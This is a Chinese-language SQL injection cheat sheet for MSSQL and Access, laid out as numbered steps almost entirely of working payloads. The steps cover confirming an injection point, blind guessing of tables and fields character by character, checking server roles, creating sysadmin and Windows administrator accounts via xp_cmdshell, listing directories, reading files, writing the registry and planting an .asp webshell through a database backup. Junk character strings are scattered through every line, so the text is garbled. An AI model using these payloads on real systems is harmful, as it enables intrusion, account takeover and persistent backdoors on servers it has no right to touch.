1.判断是否有注入;and 1=1 ;and 1=2 N|}`p"
2.初步判断是否是mssql ;and user>0 g7-K62bb
^Quy64M
3.注入参数是字符'and [查询条件] and ''=' RJD3o_("K
U4JN,`p{
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ] fB{
_{%H*PxTn=
5.判断数据库系统 8E{>czF"
AJu.
;and (select count(*) from sysobjects)>0 mssql A\Gw+l<h,
RwWQ$Eb_s
;and (select count(*) from msysobjects)>0 access *Y~64FM
Po3W+;@
f_8~b0`
ZxQP,Ys_Y
6.猜数据库 ;and (select Count(*) from [数据库名])>0 8b!_b2Za
WTx;,TNG
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 @dNbL}qQ
<5%We(3
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 htaLOTO;A
7j8_O@_
9.(1)猜字段的ascii值(access) ;q2T*4NN
P9vROzXK
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 [G*mQ@G9
;U&VPIX$
(2)猜字段的ascii值(mssql) Z)%p,DiNM
e`^j_VnEH
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 |~Iw
FReK
10.测试权限结构(mssql) T*m_rDDt
da@
.J9
v#xF;@G
|Oe6OCPf
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Wt=[R 4=
p(Mv^ea
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- +8M{y D9#
~4 ab\hq
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- :|Cf$2k7
LJD"N#c
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- f&'md
-5K/ cK
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- , utFCZW
4p.O<f;A8
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- tN~{Mt$-W
"2J;~
;and 1=(select IS_MEMBER('db_owner'));-- :nI.Qa'"H
)<d8y Lb
<3KrhhH
;<\*(rUe
11.添加mssql和系统的帐户 @Klj!2cv$
mwxJ#
;exec master.dbo.sp_addlogin username;-- N<x5:f#+
;exec master.dbo.sp_password null,username,password;-- dq2v[?*R
c1[;a>
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- SW7%SX,xM
6c :$[owC
;exec master.dbo.xp_cmdshell 'net user username password ?9:\1)]
l}x{.q7Ul
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- tR3hbL$W
@u^Ib33
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 43Q&<r$[T
<9"i_d%
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- JLhp25{x
y3#\mBiw
SzgVvmM}
ctGjqHo
12.(1)遍历目录 SDkN
j^gF~Wz^
;create table dirs(paths varchar(100), id int) LHps2,
`Oi@7/oT
;insert dirs exec master.dbo.xp_dirtree 'c:\' 7_RU*U^
:.<&Y=^
;and (select top 1 paths from dirs)>0 L@wnzt
ag6S"IXh
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 'py
k
#!2gxm;g
pmC@ fB
vd~O:=)4
(2)遍历目录 x{m)I<.:
4[?Q*f!
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Po5}Vh
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 j[9B,C4
99 ["I:
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ;$Y?j8g
7?Fl [FW$
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ;.Kzc3yz}
v [x`I;
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 W6pS.}
?NL2|8
\vI_%su1N
|l9AgwDg
13.mssql中的存储过程 ]n+:lsiV
HN:{rAIfc
xp_regenumvalues 注册表根键, 子键 }~7>S5
|^ qW
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 8]O|$8'"
1g;3MSn~
xp_regread 根键,子键,键值名 7cC$)
HBt?cA '
;exec xp_regread &5B+8>
"783F:mPh
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 C oaqi`v4T
2dC)%]aLme
xp_regwrite 根键,子键, 值名, 值类型, 值 1yhx)m;f
E_++yK^=
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 $z<CkMP!U7
og>f1NwS[
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 bHp|>g
_2|,j\f;L
xp_regdeletevalue 根键,子键,值名 #8PjYB
nP}/#Wy
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 |aZ^K\yI F
{Z|C
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 /:S.("Unv
eA!aUu
H:|yu
<a'j8pw9i
14.mssql的backup创建webshell 2]@U$E='s
z
>pq<}R6
use model U9JqZ!
A3Su&0uaB
create table cmd(str image); 9(m^^
69_c,(M0
insert into cmd(str) values (''); (vQShe\
C. Sb4i*
backup database model to disk='c:\l.asp'; z.QW*rW9
6:e0?R^aD"
NWKD:{
rP*?a~<
15.mssql内置函数 * 6uiOtH
Fr3Q"(
;and (select @@version)>0 获得Windows的版本号 j*CnnM#n
#oHHKl=M
;and user_name()='dbo' 判断当前系统的连接用户是不是sa UOa{J|k>h
;N)qNiJY
;and (select user_name())>0 爆当前系统的连接用户 cM55
vVd
er 97&5
;and (select db_name())>0 得到当前连接的数据库 b7\nCRY
n|(Y?`(
7Q^t(
vZ*593C8
16.简洁的webshell poM VB{U
_N<8!(|w
use model Z
rvb
%
#*~#t4S-
create table cmd(str image); ^D!UF(H
akaQ6DIdG
insert into cmd(str) values (''); aa$+(
HbCM{A9
backup database model to disk='g:\wwwtest\l.asp';